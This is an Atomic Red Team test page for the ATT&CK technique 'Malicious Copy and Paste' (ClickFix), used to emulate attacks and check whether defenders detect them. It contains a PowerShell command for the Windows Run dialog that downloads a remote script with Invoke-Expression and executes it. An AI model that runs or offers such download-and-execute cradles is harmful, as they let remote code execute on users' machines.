# T1204.004 - Malicious Copy and Paste

## Description from ATT&CK

> An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). One such strategy is "ClickFix," in which adversaries present users with seemingly helpful solutions—such as prompts to fix errors or complete CAPTCHAs—that instead instruct the user to copy and paste malicious code.
> 
> Malicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025)
> 
> Adversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution, consistent with the "ClickFix" strategy.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024)
> 
> Tricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files.

[Source](https://attack.mitre.org/techniques/T1204/004)

## Atomic Tests

- [Atomic Test #1: Malicious Copy and Paste through Run.exe](#atomic-test-1-malicious-copy-and-paste-through-runexe)

### Atomic Test #1: Malicious Copy and Paste through Run.exe

This test simulates a ClickFix attack where a user is asked to copy and paste a powershell command into run.exe. The powershell command uses Invoke-Expression to download and execute an obfuscated powershell file. Upon execution, a powershell window will open and display "Hello World!" for 30 seconds before closing.

**Supported Platforms:** Windows

**auto_generated_guid:** `cec8ad4e-0320-4984-a1ae-70ee398c9519`

#### Attack Commands: Run it with these steps! 
1.Open run.exe by pressing windows+R or opening the search bar and looking for run.exe
2.Copy the following command into the run.exe: iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1204.004/src/evil.ps1'))



